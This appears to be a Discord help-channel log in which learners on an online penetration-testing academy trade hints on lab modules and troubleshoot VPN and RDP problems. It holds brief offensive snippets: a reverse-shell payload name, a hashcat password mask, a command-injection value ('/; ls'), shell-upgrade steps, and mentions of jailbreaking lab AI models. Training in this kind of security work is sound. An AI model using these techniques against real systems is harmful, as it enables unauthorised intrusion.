it worked, thank you

Can I ask how you fixed this problem?

https://tenor.com/view/ishowspeed-meme-trying-not-to-laugh-laugh-homeless-gif-9458928528704746136

hey guys
I'm stuck at SQLi final exam , tested bunch of payloads including the HTB cheat sheet ones , but it is not working

dm me

Hello, I don't know if this is the right channel, but I'd like to do the AI red teamer path. I've started the first module, fundamentals of AI. I'd like to know how to approach this path. Is it necessary to know all the mathematical concepts perfectly or is just an overview enough? I have no particular knowledge of AI or the mathematics of data. The aim is to find out if I need to become a data scientist to do and above all understand the path 😅, Thank you in advance.

Well the AI Red Teamer path is built on mostly the understanding of AI; I believe there's a few introductory AI modules (unsure if they're part of the path)

There is indeed an introduction to ia, but as I have no basic knowledge of ia, some concepts remain a little vague.

not sure if much of the concepts get explained as I haven't done the path. Surely research/googling can yield some results ¯_(ツ)_/¯

I understand. In fact, as I was saying, I would have liked to know if I need to master all the concepts of ia perfectly, and therefore train upstream, before starting the path. Thank you anyway for your answer.

I don't have any time constraints, so I'm just going to launch it and see what happens.😅

if anyone struggles with the password attacks - pass the certificate (confusing module) dm me i can guide in the right direction, there's alot of small details that aren't mentionned in the module

#1234357888114364508 could be good place to raise these recommendations I think?

yes ill write something there later today

Hello, yet another post about the famous Exploiting Web Vulnerabilities in Thick-Client Applications but how are we supposed to get rid of compilation error of ClientGuiTest.jar when we have never touched java ?

I'm hardstuck :/

At this point of the section
javac -cp fatty-client-new.jar fatty-client-new.jar.src\htb\fatty\client\gui\ClientGuiTest.java

And debugging on laggy windows rdp session is a pain in the ass

hello guys any hints for this section I'm stuck on it for days /module/171/section/1692

Which one is Module 171? And which section do you work in?

intro to nosql injection 1692

Which section is 1692?

skill assessment 2

Okay, so what exactly is the problem?

I do need a little bit of information to help you.

I see that the challenge giving some errors but I get no nsql-injection indication or errors

Look closely at the error messages. Bit by bit.

can someone give me a hint about Linux Local Privilege Escalation - Skills Assessment, the method to get initial foothold without ssh password. What i did is i know the webservice, the domain, the version of the web, the port. However, i don't know which exploit can lead to initial foothold. THank alot

#LFI
how solve assesment in CWES

DM me if you wnat

Which assessment?

Hi, i'm sry to ask but can someone help me find the version of gitlab on the **Gitlab - Discovery & Enumeration **section from the Attacking Common Applications module :

i found the second answer but i cant find this one i searched everywhere 😭

if I remember well, gitlab version is visible in the /help endpoint but you have to be authenticated

Hi

Access to the lab environment to complete this part of the lab will be a bit different. We are using XfreeRDP to provide us desktop access to the lab virtual machine to utilize Wireshark from within the environment.

We will be connecting to the Academy lab like normal utilizing your own VM with a HTB Academy VPN key or the Pwnbox built into the module section. You can start the FreeRDP client on the Pwnbox by typing the following into your shell once the target spawns:
Code: bash

xfreerdp /v:<target IP> /u:htb-student /p:HTB_@cademy_stdnt!

You can find the target IP, Username, and Password needed below:

Click below in the Questions section to spawn the target host and obtain an IP address.
    IP ==
    Username == htb-student
    Password == HTB_@cademy_stdnt!

Can someone help me with this

What is even your question?

Dude

#modules message

Read that

xfreerdp /v:<target IP> /u:htb-student /p:HTB_@cademystdnt! I used this

Still not seeing a question

Ok

Me either

yes, but they dont provide any creds

Answer the question(s) below to complete this Section and earn cubes!

Target(s): Click here to spawn the target system!

RDP to with user "htb-student" and password "HTB_@cademy_stdnt!"

• 2 What was the filename of the image that contained a certain Transformer Leader? (name.filetype)

hacker:Welcome but i doesnt work

create one

if you can

@hidden ledge @storm elk

This is

oj

The question

yeah XXDDDDDDDDDD

ahahaha

Seccion is this: Packet Inception, Dissecting Network Traffic With Wireshark

We can't answer HTB modules questions at your place, we can help if you are stuck at best

I know

Because it has to don with connecting with this

xfreerdp /v:<target IP> /u:htb-student /p:HTB_@cademy_stdnt!

It tells me to use a vpn file to my machine

Ok this it a bit more clear

This is what I've done

So have you downloaded the vpn file and connected to it?

But then it tells me to connect me to 172.16.10.2 with the following credentials

Yes

And it doesn't work

Can you share a screenshot or so

I can't

I don't have permissions

Damn

Can you cope/paste the errro?

You should see it in your cli

Okay

The IP you provided is not the one you should connect to

IP provided by htb are of format 10.x.x.x

Aaaah.

You mean the ip of the pwnbox

Wait. It doesn't make sense

The ip displayed when you click on "spawn instance" just above the questions

Just like this.
You are actually talking about the internal network ip. You will have access to it once you are connected to the instance.

Aaaah

Okay

Please don’t use that word @lapis frigate

It’ll get you auto muted

Yeah

Hahaha

Thanks eh

No worries 🙂

Where can I find the official cpts preparation track (list of practise machines ) ?

I want the same thing for CWES

https://app.hackthebox.com/tracks/76

There is no track for CWES.
Boxes has a different goal than CWES

Where does weight help in an activity?

Hello, for some reason, on the Windows fundamentals module, I try to connect to the vpn using the way I always have but now for some reason the vpn won't ping back

I've tried everything, even GPT couldn't help me.

Also the target IP addresses are not spawning.

ok the IP target spawned finally, I try to connect to vpn and it says "initialization sequence complete" but it won't ping the target IP

it should be related to the module you are doing, what module is it?

privilege ladder

which box is it?

It's an activity from the "beginner" academy.

do you have a link?

yes

https://academy.hackthebox.com/module/77/section/844

so I'd expect that the answer is based on details on that page, so either ssh keys exposed or sudo, did you check those things?

also download and run linpeas, that should help you identify a way in

Linpeas outputs a loooot of useless info, its a shotgun tool

true but it will find it, although that page has the info needed

While correct, its easy to miss in Linpeas

And I believe its a public_ip:port, making file transfer all the more difficult. Since their containers are more locked down

[Ik scp works]

or copy paste

then what should I do

Thank you so much, thanks to your help I was able to

the beginner modules especially will have what you need on that same page

On this module https://academy.hackthebox.com/module/49/section/454 I am using a Kali Linux VirtualBox, I've tried connecting to the vpn the same way as before but nothing seems to ping back. Also, I try running this command xfreerdp3 /v:<targetIp> /u:htb-student /p:Password and the Windows desktop will pull up but then it shuts off in 5 seconds.

am I missing something?

Are you sure you do not have a Pwnbox instance still running on Academy?

Multiple connections with the same OVPN config will "fight" against each other

Also, check out the last couple of points in this help article, they have helped others in the past

https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn

no pwnbox connected

Do you see your VPN connection "resetting" frequently in the logs, or is it stable?

I have been having this exact same issue and was about to ask the same thing

Connection appears to be fine

Wait a minute or two, do you see another "Initialization Sequence Completed" message?

if i try to ping the target IP, nothing comes back

Okay, in my case I can ping the target IP fine, RDP works fine from the PwnBox, HOWEVER, the moment I use my own kali VM via the vpn to try to RDP to the target machine instead of the PwnBox, I am unable to do it. I have tried with xfreerdp, rdesktop, and remmina and none of them work no matter which security settings I have configured.

Ok one thing at a time 😅 but sure, @hollow wind is your Pwnbox still running? If so, terminate it

@lucid forum which VPN server are you connected to?

academy-regular.ovpn

dude someone in the support terminate my plan and I did not told him to do that

this is rude

Please speak with support, I can't help you with that

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

okay

Oops, sorry for butting in, I can wait my turn 😁 . BTW, my pwn box is not running at the same time as my kali VM but in the meantime let my try again just to make sure.

for host 1 on shells and payloads skills assessment how do we get to know what payload type to give to msfvenom
in this case we gave|| java/jsp_shell_reverse_tcp||
but there r many more java payloads compatible with war so do we experiment with all ?

In your ovpn file, the line that starts with "remote", what is the hostname there please? 🙂

not sure what you mean srry lol

Ok, it's fine

I use sudo openvpn academy-regular.ovpn command in kali linux machine

I see you now.. youre connection keeps on reconnecting, suggesting you may have multiple openvpn clients running at the same time

Easiest option, reboot your VM you're working from and reconnect fresh

Sometimes openvpn can drop into the background (the client process), resulting in multiple clients trying to connect at the same time

You could try sudo killall openvpn first

and the reconnect

I tried sudo killall

Can you start the openvpn client again please?

Ok I see a ping response from you now

Are you still working on those? I just finished it if you had any questions.

I restarted the machine, openvpn is running

Are you able to reach your target now?

(without it dropping after 5 seconds)

nope

no ping response

Can you stop and start the target perhaps? You're still on the same VPN server..

Sorry, doing the best I can here.

all good, you want me to close the vpn and reopen too?

No the VPN can stay open

You'll want to stop the target on the Academy

and start it again, then try the new IP

Issue persists, black screen for around 20 seconds and then it times out

target IP is taking awhile to restart lol

It can sometimes, it'll get there

https://tenor.com/view/2-hours-later-spongebob-spongebob-squarepants-gif-3681423529790794814

I wonder if it's just my ISP being slow and there is nothing I can do about that :/

Ping from the VPN to you is not horrendous

The target has still not come up?

nope

target took so long it gave up

Did you just try to spawn it again @lucid forum ?

it finally came up and still no ping response to target

IP ending in 162?

yup

Strange, route is stable between you, the VPN server and then to the machine.. Honestly I'm not sure what the issue is.

Can you ping 10.10.14.1?

yes

And there's no conflicting route locally with the 10.129.0.0/16 subnet?

I mean you should've seen errors in openvpn if there were

I'm sorry.. I've no idea why you cannot access the target IP from your VPN connected Kali instance.

The routes look to be fine, the VPN can reach you, and it can reach the target

I've never had this problem before

Maybe the box hacked me! 😱

All I can say is, please can you speak with support.. sorry, I thought we'd have this fixed by now

Hey goblin, you got a sec to check out this issue im running into?

Sorry but it's like midnight

This isn't even my job

oh lol

I just like to try to help when I can

go get some rest haha

thanks anyways

Support is your best bet, sorry

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

No worries, ill reach out to them 👍

hey, is anyone's guestmount command working? The command seems to be missing for me even when reinstalling it

anyone having problem with this section?
https://academy.hackthebox.com/module/134/section/1186
The target takes too long to load in my browser

and when I curl I dont get the same result in the section

because there's a missing link to get the results; you should be able to go into the network monitor/browser devtools -- find the request for 'welovefonts' -> blacklist that and it'll load just fine

tysm!!! was that mentioned in the section ???

ive blocked it in my browser but same curl result

how can i block it in curl

the issue with curl is a separate thing; i've led you to part of the answer (network requests) investigate that further 😉

(note it's not a bug with curl, curl doesn't care about fonts)

Im experiencing error in purchasing a cube. It says my that transaction was declined.

"Transaction was Declined, please contact support."

Even when i use my other card. It pops up and error

For billing issues, you'll need to reach out to support @worn swallow

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

Thank you sir

Billing is something cannot help you with on Discord, apologies

Which inveigh.exe should I use ?

Whichever is the appropriate one for your operating system

For windows I am referring to

There are so many different .net and there is also native and trimmed

i just yoinked the inveigh.exe that's on the C:/Tools of the target machines

protip: copy the tools from the machines on htb

...or do that

well... if they were tested with that version :D

I'm agreeing with you

🙂

Yes but I need to know which one to download so that I can transfer to the target machine because in real world it won’t be preinstalled on C:/

Otherwise probably https://github.com/Kevin-Robertson/Inveigh/releases/download/v2.0.12/Inveigh-net10.0-v2.0.12.zip

they're different releases so like g0blin said you need to pick what works for your os and architecture

nativeaot being smaller to be suggests it uses libs available on the target

with trimmed-single being large being inclusive

That may be completely incorrect however

Experiment and test I suppose

well... once you yoink it you don't need to re-yoink it

(this is assuming you're using your own machine)

I didn’t get that . I don’t really understand what yoink means

yoink = steal/pillage/take

Did you shout or something Marcie? I didn't think my answer was completely stupid 🤣

I took the Inveigh.exe that's on the C:/tools/ folder from the windows modules

huh what? can't hear you, speak up. But no, your answer wasn't completely stupid, because it provided the larger framework outside of academy

I believe the port forwarding cheat sheet about reverse port forwarding has a mistake

This is the command they give : <InternalIPofPivotHost>:8080:0.0.0.0:80 user@<ipAddressofTarget> -vN`

And this is the description : Reverse SSH tunnel from target host to attack host. Traffic is forwarded on port 8080 on the attack host to port 80 on the target.

I believe it’s the opposite . The description does not make much sense anyways

Any nudge towards first question in Windows Lateral Movement Skill Assessment, what should I be looking for? So far I tried ssh, rdp (not on default port as well), web browser PS, smb, dcom but no luck so far

Enumerate

as in, enumerate services (did that) or websites?

You have been given a set of credentials, if you enumerate carefully you will find where you can use them

And the answer is within the explanation in the initial question you've asked

Module is above tier 0 @chilly night, please try not to spoil.

hi, on LINUX PRIVILEGE ESCALATION > Linux Local Privilege Escalation - Skills Assessment

can someone help me in the right direction to find flag5.txt? i have flag4.txt answer already but i have no ideal what the next approach

is it got to do with sudo -l approach? i tried that but does not seem to work

you did not solve it yet-_-

Network requests, look for the one to the ip:port :) it'll bridge gaps

ha

I didn't understand🥺

is that a module

Sometimes the examples from gtfobins don't work, and you may need to modify the payload

Hi. Im' studying the Bypassing Web Attacks -> Basic Authentication module (https://academy.hackthebox.com/beta/module/134/section/1175). From the pwnbox I'm trying to execute "curl -i -X OPTIONS http://94.237.120.137:45455/" but i don't get server accepted methods:

HTTP/1.1 200 OK
Date: Fri, 12 Dec 2025 08:42:58 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1210
Content-Type: text/html; charset=UTF-8

[body response]...

I've already tried to restart both pwnbox and target without results. Any hint?

The response header should contains: "Allow: POST,OPTIONS,HEAD,GET"

you can DM me

got it thanks

solved thanks @coarse pine

Hi, I'm on module Attacking Authentication Mechanisms -> OAuth

In the module Attacker Server (attacker.htb) was mentioned. Also in the target system spawned it shows
OAuth Client Routes: here
OAuth Resource Server Routes: here
OAuth Authorization Server Routes cannot be interacted with directly
Attacker Server (Remember to add the port): http://attacker.htb:PORT/

Is the attacker server accessible, if so what is the port? or I should be hosting the server?

can you give the section link

https://academy.hackthebox.com/module/170/section/1667

sorry can't help in that

no worries. but do you understand my question? Not sure I was clear

I think you have to add the port and the domain name in /etc/hosts?

The full environment is available on the IP and port provided

You don't need to host anything on your Pwnbox or machine

got it . thanks. Module instruction wasnt clear.

thanks . you are right .

wow!!

make me a mod

Not my call

🥺 .

Anyone I can ask about 2 qs for the Wi-Fi Penetration Testing Tools and Techniques modules ? https://academy.hackthebox.com/module/298/section/3962

Perform an attack against the Wi-Fi network "Inlane-Management". What is the password obtained for user "peter"? and Connect to the "Inlane-Corp" Wi-Fi network and navigate to the gateway at "172.27.0.1" to retrieve the flag. Submit the flag as your answer. in particular

Can someone help with the Intro to Windows Evasion -> Static Analysis. Cant complete the first evasion challenge. Windows defender keeps identifying it

I copied the code directly incase i messed up somewhere, I ran threatcheck and it seems to be triggering on my AES calls, so I modified the decryption function to hopefully bypass any static signature but nothing is working.

ThreatCheck shows some wall of text but not sure what exactly inside it is triggering, especially since ive changed it a few times

The 'options' header isnt set to respond

To simplify, look at the network request with the browser dev tools when you click on 'documents' from the home page

Port doesnt go in the hosts file, ever

You ve done the 2 new wifi modules ?

hey Mrcieleee

I will start my first CTF challenge

Haven't touched any of the wi-fi ones

🥺 .. I am nervous

I am with a team that I don't know a single person

Then talk to them

okay

it started now

bbyyeeeee

love you

if I win I will pay you

https://tenor.com/view/john-mulaney-nothing-i-did-nothing-gif-13526080

Just roll with it

If this is related to a CTF and not a module, this is not the channel to post this content.

good morning. very new to this and learning which chat I should go to for this. I am in the HTTP request section and asked this: Send a GET request to the above server, and read the response headers to find the version of Apache running on the server, then submit it as the answer. (answer format: X.Y.ZZ) not certain what to put in. I have tried GET ip of server and ip with port#, but can't seem to get the answer

You can use curl -I to get the information

In your response you should get something like server:apache/x.x.x

Nice my eyes glass broke

I can't even see!!!!

can anyone help me

this isn't the appropriate channel for shenanigans; #general

still not accepting though

look closer at what the format is asking you

also don't post answers

it's just asking for the version number format

oh okay sorry

so x.y.zz

so like 1.0.00

I did that but still didn't take

dm me with what you submitted

could you dm me instead. I am having too many issues trying to figure this out

I genuinely don't care if you don't place high, then that's more on your team than it is on you as a person.

can someone help me with the Applications of Ai in Infosec module?

i am facing issue in getting the flag for jailbreak 1(even after jailbreaking the llm)
can you guys please help me over it?
https://academy.hackthebox.com/module/297/section/3416

Hello Everyone. Im working on the Manipulating the Model https://academy.hackthebox.com/module/294/section/3342

I dont answerstand how to answer the questsions. I can manupulate the modole by changing the message, is the model suppose to return a flag or something?

Yes, you will be presented with the flag if you complete the task successfully

so we have to wildly guess? gotcha

okay I figured out the first two, but the last question

Exploit a flaw in the web application to steal the trained model. Submit the file's MD5 hash as the flag.
with the hint to look int the html code

I dont see it anywhere

nvm, I see it now

a quick question in the Attacking Common Services -Attacking DNS they are explaining the ettercap method .. which can only be done locally via lan right? since we are connecting via a vpn thats not possible right?

there is a typo at subbrute part in attacking common services ive marked them

#1234357888114364508 is the place to post for corrections

"Attacking FTP" box Q 1, on which port FTP service runs on.

You type 21, and get wrong answer. Very funny.

2121

yep

I am cooked

Gordon ramsay would be proud

whois Gordon.ramsay

World renowned Chef

silly

Hello guys, i would like to ask about problems with submitting the flag as the answer. What else can I do besides resetting the machine? I’ve been trying for a while and looked for other possible answers, but I think there might be something wrong with how the flag submission is being handled.

The answer you have is not for the section you're working on

Maybe you went a bit too deep too quick 😅

Or you have a space

No

It's what I said

At some point, that's for sure 😂

You connected to port 22

Is that the port listed in your target?

it was the intro to pen testing module and basically just said use what you learned, which was basically just using netcat to see what was running on port 22 (obviously ssh), but the versions are different so it throws the answer as wrong.

You had to spawn your target

That is the IP and port you need to work against

22 is indeed the usual SSH/SFTP port, but your target may not always match the ports in the content due to how we host the interactive portions

Take a look at where your Target IP is specified, just above the question

🙂

Ahh. That makes much more sense.

Thanks

No problem!

@fierce oyster Please take care not to post answers

Thought it didn't matter since it was an Optional module, that also had a button to give the answer right next to it....

Yeah but that may spoil it for some

i just wanna say the parrot machines on the "shells and payloads" module are really slow. also on some other modules

not fun to use

VM is always going to be a better experience

i usually use my own vm but for this module you have to use the ones given, i think

ahh yeah there are some like that, you can usually pivot through still though

whats your favourite way to pivot other than ssh

favourite way to port foreward rather

In password attacks module, section pass the hash why was I able to view the shared resources of david when used mimikatz from windows but was not able to view shared resources of david when used impacket-psexec for david it says access denied @fathom pendant @cloud urchin

Don't @ people; the simple answer is- you're connecting to the dc, which is a separate machine.

can u explain please when I connected to david's account, I am basically on same machine just my authentication has been performed by DC as the user david and same goes for impacket then how am I on a separate machine

if I am in AD environment does it makes any difference because I am essentially having privileges of the same user david in both the cases when using mimikatz I am already an admin and then moves laterally to david and using impacket i just hops from my linux machine to the user david ??

the file you're looking to enum with is on the DC; localadmin != domain admin

you'd need to pass along the hash through a connection like a tunnel/pivot

Thank you

Hello all !
Anyone available for some questions about the SA of Advanced SQL injections please 🙏

Hey everyone, I'm on the final question of the "Pass the Ticket from Linux" module. I've successfully authenticated as the LINUX01$ machine account, and klist shows a valid ticket. However, I'm blocked from there when trying to access the \DC01\linux01 share. Any hints on what I might be missing? Thanks

you can dm

Hello everyone , I stuck in the module called "shells & payload " in the section called " Infiltering unix/linux " the payload of rconfig as shown in the section is not working can anyone help me ?

Did you create a listener on that agent correctly? You can DM what you setup.

Yo need a hint with Windows Lateral Movement SA Q1, I have enumerated all port and try ssh, rdp , smb and dcom but no luck so far

Could anyone help me with Crackmapexec skills assessment Q3 please?

You might want to check your nmap results again.

The web port part ?

Use the account from the previous question to begin your enumeration process over again.

Not sure what you identified in your scan, so if something was in your results that was covered, I would focus on that.

If you would like to discuss more information that is potentially spoiling, ask to DM first, don't just DM, as I will most likely just ignore your DM and refrain from helping you further.

Hey all, I'm doing the Footprinting Labs - Medium, and I've enumerated quite a few things thus far, i.e in short, nmap to view ports opened, found the 'xx' credentials and tried connecting with ssms with various connection options and failed, I can RDP into the target with the account credentials I also found, I tried other tasks from the module with no luck.
I can search past messages on this topic, but i don't want to as I might see the direct answer, and I just want a nudge in the right direction.

consider what those two letters stand for to be able to run as

thank you. I've got the foothold now. and I feel really silly about how I could of went about it. I did do a runas before, but just didn't think of the xx creds.

i think the 'hint' on the Q points at this

I'm doing the Finding Files and Directories section of Introduction to the Windows Command Line, on the second task it asks me to find a file named waldo.txtx, i've tried using where with the /r switch to make it recursive but i still haven't got any result, may anyone help?

i was able to where just fine. dm me

What exactly does the run as command do ? It lets you run commands as another user ? Also this applies only to network resources such as shares or also local recourses e.g. local directories such as administrator’s desktop

runas is like sudo; runas also, in the context of windows, allows you to run things as a specified user, they can be a local or remote user https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11)

sudo also does the same thing; sudo -> switch user and do; the default for sudo is root but you can use -u to specify a user

so sudo -u someuser /bin/bash (if you have the permissions to run, as that user)

@dull solar your message was removed because your screenshot contained an answer

So can I crop and resend?

it helps to provide the module and section name

Module: Network Traffic Analysis Section: Fundamentals Lab

||"How do you start a capture with TCPDump to capture on eth0?"||

i'll check bc i believe i did that one and i think it's a case of formatting

Oki

no sudo

My image had no sudo and I removed spaces from the side. Still no

your image had sudo 😉

refresh the page and try again

Ty

Does anyone have a suggestion for how to proceed with the DnsAdmins on Windows Escalation? I didn't see anyone reply to my last request, and I've been stuck at this for like a week now. after loading the adduser.dll it lets me add netadm to the DnsAdmins group, but I still don't have privilege to grab the file from the Administrator directory

I tried using mimilib.dll like it says further down in the page, but I don't think it's clear what to do with that here. I tried loading it in the serverleveldll registry, but it fails when I try to do that, so not sure what the guidance actually is meant to convey

DM me

Thank you for your help! It turns out I was doing it right, just needed the right way to access the file once I had permission.

Hihiii, can someone help me with password attacks skill assessment?

Anyone available for DM on the Active Directory BloodHound module? I have a question on the "Nodes" Section question 1 (To which computer is user Sarah, an administrator?). I have the answer, but I'm not seeing something in BloodHound that I expect to see.

[NEVER MIND! SOLVED!] Hello, I am doing the Manipulating the Model module from the Introdiction to Red Teaming AI track. I need to download the code/files from a Resources section but can not find that section in the page, where is the Resources commonly found?

Howdy! I am currently doing the Detection & Analysis Stage (Part 1) section in the CJCA path. I am attempting to answer the second question which says, "Assign the Mimikatz alert (shown in the section) to yourself in TheHive, and go through the description and summary. Provide the username of the person who executed the Mimikatz tool. The answer format is "domain\user_name." I have a few times put the following in the browser in Pwnbox: [IP]:9000 but the TheHive page never appears. Is anybody having the same issue?

it can take a few minutes for it to spin up fully, i generally try and give ~5 minutes after spawn if something is dependent on a web interface or some other service

Yesterday, I waited and waited..probably 20 minutes or so..refreshed the browser...nothing! I am trying it again today and no success so far.

are you doing http or https?

also of course dropping the brackets so something like https://10.129.x.x:9000

http. Of course, there's no brackets. I even sent a ping to the IP and it connected so I know the IP works. I did test https yesterday and it didn't work. Let me see if it works.

I put in: https://10.129.228.226:9000/ and it said, "Secure Connection Failed."

Ah! I see the problem! The browser was forcing it to use https. I reverted it to http and it works.

Ah yeah that'll do it

it should be /; ls but it doesnt work

dm me

hello can someone help me answer this question i am stuck here for about days and i didnt find the answer : Assign the Mimikatz alert (shown in the section) to yourself in TheHive, and go through the description and summary. Provide the username of the person who executed the Mimikatz tool. The answer format is "domain\user_name." its from the incident response lab

Inlane_ is a prefix and the password should be at least 10 characters.
So you can try -a 3 'Inlane_?a?a?a'

You can use backticks ` for command stuff

Or put a \ before to escape it

Thanks

I am getting this exact same error. I can access the webpage at port 80 but the /nibbleblog url returns the Net::ReadTimeout error. Were you able to resolve it? I tried resetting the target a couple of times but i get the same error.

i was able to solve FootPrinting module medium and hard labs with one hint for each one, is it good?

anybody else havign problems with htb vpn session timin gout

im close to losing my mind

as if learning this stuff isnt hard enough

it's good; the thing to take away (if you feel you need to use them) from hints is how you should think about the scenario differently

it's easy for the medium lab to overlook something that's obvious in hindsight

actually, it was my mistake for medium lab, even though the thing i missed mentioned multiple times through modules, all my focus was on services, so i missed it, it is the same for hard lab

too much focus on commands

if it was bad to use hints, they wouldn't exist

Going through the SIEM module, it is said that the following image is a demonstration, but there is a codeblock instead of an image. I can understand what the goal is, but is this intended?

#1234357888114364508 ; if this is on beta -- switch back to normal

it's using the markdown syntax of linking an image so... no it's not intended to be a 'codeblock'

Oh yeah, it was the beta issue :D

i'm sure you can grab the image from https://academy.hackthebox.com/<insert link here>

right, they are pretty useful, actually i think i did this module's lab pretty good this time, because this is my second time going through CPTS, and first time didn't take notes, gone through all the modules very fast and didn't even understand most of the content.

it's all in how you view it, it's ok to need a bit of a push -- and going through it again not as something to complete, but something to learn is definitely useful to your mindset.

i am squeezing out all the knowledge from the path

For the module Information Disclosure what is the flag: "After executing an introspection query, what is the flag you can exfiltrate?" I have done all modules and the Skill Assessment, but i dont understand which could be the answer

@fallow sable the module is above tier 0; don't paste anything like that. make sure you pay attention to ports

Oh, I am sorry - I’ll review the module number before posting next time. Should I want to ask a question and it is above tier 0, where do I ask it? The CPTS section?

I’ll delete my original post

you can ask it here; and the same rules apply to other channels. Just don't spoil information

I understand, thanks

Anyone tried installing Nessus recently? Guidance in Vulnerability Assessment module doesnt match the installation route now.

For example this is the nessus installation options - there isn't an essentials? Unless im going mad

They have nessus installed on a box for you to use if you don't want to go through all that I think.

also i don't really remember, but you may just be able to pick one and move through the installation and if it asks for a key or something you skip or don't do it, then it just becomes free version maybe?

https://www.tenable.com/products/nessus/nessus-essentials

they do still have the essentials version

yeah I picked a couple and it rejected the key, and then went into Nessus Manager was only one that accepted the key, I signed up for Essentials as the docs online suggest. Weird one - I have no functionality like new scans 😄

Unfortunately the module lab isn't enough, need this on my machine as I want to do this for my report

Does anyone else suffer with a super instable RDP Connection to Windows machines (like in Windows Privilege escalation). Although this only is the case when using the VPN (in the PWN Box everything is fine). I already went through all of the EU VPNs and there is no improvement

presume youve switched tcp to udp as well ?

yes

when you say unstable ,does it kick you off the connection every now and then ?

it kicks me out or sometimes doesnt even establish a connection

I get this as well, have got it across many modules, didnt happen for me in the exam tho

It is extremely annoying

yeah i heard the exam environment is stable

but yeah this is really anoying and it basically takes longer trying to get a connection, then to actually completing the task for the section

Sometimes ive found my keyboard pasting can be the issue, +clipboard has differing results sometimes I try with and without /drive: etc, crashes sometimes when transferring files, sometimes it crashes when running scripts, ofc when you eventually get back into the RDP window, nothing was impacted and scripts still run etc

Although instead of tempting fate and switching rdp between users, I tend to use runas /user:user if the target user is on the same device/same domain. Otherwise yeah have to switch and roll the dice again

the clipboard thing is also interesting. I noticed that you sometimes need to insert twice

then it works

i feel that

yeah noticed that too, interestingly if you are pasting into a powershell window, make sure you are not tabbed into the RDP window (like its not opened/active) then if you right click the pws window and paste, it most often pastes first time. if the rdp window is active, it fails least 70% of time 😄

Step 1: Read the blurb at the top of the module page, don't skim read - it gives you pertinent info! Wow. Could have saved myself two days of testing.

hey can someone help me please im about to lose my mind. ive been trying this since 5 hours with no solution

im trying to convert to a tty shell

what am im doing wrong

normally the next step would be fg in foreground

Is that for an academy module, or what?

its nibbles

the beginning

Ok, best to include the module name when asking for help 🙂

ok yeah will do but should be a basic operation upgrading the shell no `?

Wait, Nibbles is a machine isn't it?

So.. #boxes ?

Ok, fair enough - I was not aware it was included there.

look i just need help upgrading the shell

are you a moderator no ?

No, I'm staff, was just advising to include information about what you're struggling with, specifically the module name

It helps others to help you. I'm afraid I'm unable to help with content

So I don't think you can just bg/fg like that in an upgraded reverse shell

It's "upgraded", but still not a true shell

looked up stty raw -echo in this chat and the first thing i saw is that it's a common problem with kali/zsh

stty raw -echo; fg is the common solution to the problem

takes notes

That's not mentioned in that section though, like stty as a part of the shell upgrade process

it's in the 'types of shells' section from that module though in the module it's written as

www-data@remotehost$ ^Z

MarcieLee@htb[/htb]$ stty raw -echo
MarcieLee@htb[/htb]$ fg

[Enter]
[Enter]
www-data@remotehost$

g0blin was referring to the 'upgrade' part

thanks i will test that now. do you recommend using a differentr shell than zsh ?

zsh is fine, just gotta learn its quirks

Thanks for clarification, never gone through using stty when upgrading shells in the past, good to learn.

Was focused on the mentioned section too much, mb.

np i always forget about it too, had to look it up bc it trips me up (i never really bothered with the upgrade)

damn really makes me question like how come you guys never had to do this ? are there better ways ?

i just did the python upgrade but didn't bother with the stty part

omg it worked

you saved my sanity

thanks

i, also, don't use kali lol i use parrot which uses bash as the default shell -- not zsh

do i always need to downlaod a new conection file for vpn when doing a new module ?

Generally no, unless you are changing VPN region

ok thanks

I am stick at Nibbles - Web Footprinting from the Getting Started module. I can access the target in the browser and can see the /nibbleblog reference in View:Source. However when i try to run whatweb on the target, i get a weird timeout error - Net::ReadTimeout error. I have seen references to this error on this forum and elsewhere with no resolution. I have tried resetting the target a few times to no avail. Can someone shed some light on this issue?

I have the Silver Annual subscription. I am not on the VIP plan. Does this have anything to to with this? Thanks !

VIP and Silver Annual are on separate platforms, so no

send the whatweb request in here

maybe typo ?

Hey guys! Good evening! Im on system information on the academy, do I have to download the VPN connection file to ssh into “htb-student” password “HTB-@cademy_stdnt!”

Im running on a mac m3, so idk how i would do that, unless i need to connect to a hypervisor that is running linux etc… im assuming thats what i need to do?

VM is probably going to be the best way, yes. parrot/kali are good. you'd need to connect to the VPN to access the private subnet.

Ah ok, that makes sense now, i started an instant on the website, I thought that would work, but when i tried to ssh it kept asking for a pass, and im like i never made one… how do i get it?

oh yeah, you can use the pwnbox too

but you only want to use one, the vpn or the pwnbox. one or the other, not both at the same time. they use the same IP

within the pwnbox you can open a terminal and ssh

I dont necessarily want to google it, cause that would be cheating

┌─[user@parrot]─[~/work/nibbles]
└──╼ $whatweb http://10.129.218.33
http://10.129.218.33 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.218.33]

┌─[user@parrot]─[~/work/nibbles]
└──╼ $whatweb http://10.129.218.33/nibbleblog
http://10.129.218.33/nibbleblog [301 Moved Permanently] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.218.33], RedirectLocation[http://10.129.218.33/nibbleblog/], Title[301 Moved Permanently]
ERROR Opening: http://10.129.218.33/nibbleblog/ - Net::ReadTimeout

I just tried this using pwnbox and it works just fine. My own parrot VM (via academy-regular.ovpn) is erroring out.

Im stuck on the academy, page 6 of linux fundamentals,

What is the path to the htb students mail? Can i use google for this?

“What is the linux file path for mail?”

But can i do this without google :/?

am i missing something in the lesson?

any nudge for attacking ai - application and system skills assessment?

i've got the ||platform, password|| already, and tried every function that I thought would work to make something potentially show up in the logs. I've also tried things like sql injection and command injection, but to no avail. It looks like it could be ||LFI|| but that failed on me as well

Have you terminated your Pwnbox instance before connecting on your VM? Do you see any errors or warnings in your openvpn console on your VM when connecting to the VPN? Have you tried terminating the target and re-downloading your VPN config and connecting with that fresh config? (I don't think the last should be required, but just a suggestion)

@ocean night actually i never used pwnbox until now. Everything upto this point worked just fine using my own parrot VM. I just wanted to narrow down the possible causes and thought of trying pwnbox to see if the target was an issue or something else. I have terminated the target several times but it has not worked. I'll try downloading the VPN config again.

